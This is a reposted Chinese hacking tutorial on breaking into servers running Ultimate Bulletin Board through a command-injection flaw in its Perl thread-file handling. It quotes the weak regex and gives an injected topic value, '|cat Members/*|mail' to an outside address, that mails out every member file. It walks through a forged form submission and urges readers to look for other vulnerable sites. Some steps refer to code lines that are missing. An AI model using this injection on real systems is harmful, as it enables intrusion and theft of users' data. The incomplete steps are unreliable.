网络通信 频道

轻松入侵运行UBB的主机

UBB即为Ultimate Bullitain Board的简称.是一个网络软件.曾经有一个wwwwboard的漏洞,可以是黑客幸运的获得root权力.但是我们这儿应该是更高级的了.UBB是用perl语言开发的软件,很多站点都使用它,包括progenic.

用Perl编写cgi脚本很简单.而且也很安全,但是他们能接受下面的这些问题吗?

浏览一些站点,我发现一些主页用自己写的脚本,但是更多的是用的网上的软件.还记得pcweek的那次活动吗?他们在Linux机器上装了商业版的photoads,结果被黑客利用了.下面让我们来看看Infopop的UBB.

我从http://www.ultimatebb.com>http://www.ultimatebb.com 下载到了UBB,十分钟后,我找到了下面几行:

ubb_library.pl:901-902
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
(注意? 不是 /^\d\d\d\d\d\d\.ubb$/.开发它的程序员是怎么想的?难道是女孩?)
而且,$ThreadFile的值是直接从隐藏的部分 "topic=''''"中获得的.

所以,我在表格中填入了:
topic=''012345.ubb|mail root@t0db.org
(在不同的主页上,000369.cgi 也是不同的)
找到后,你把 "|cat Members/*|mail root@t0db.org"粘贴到000369.cgi的后面,就像下面这样:(root@t0db.org 换成你的信箱地址) 保存一下,然后回到你查看源代码的那个页面,在右面你可以看到"want to register"的连接,你把它的连接拷贝下来.回到源代码中,找到下面这一行:
再把刚才的地址粘贴到postings.cgi的前面,

整理修改一下:
现在把源代码保存为一个html文件到硬盘上,现在打开它,输入你注册的用户名和密码.写上标题等等.然后发送.接着下面就会出现,不能贴此贴的意思....
我们已经成功了,我们现在只要到信箱中等我们的文件就可以了.
现在这个例子已经不能再利用了,你如果想动手试试,那么只要再找一个类似的站点就可以了.
我们对此篇文章不任何责任.:)

文章转载地址:http://www.cnpaf.net/Class/hack/05121820345054020294.htm

0
相关文章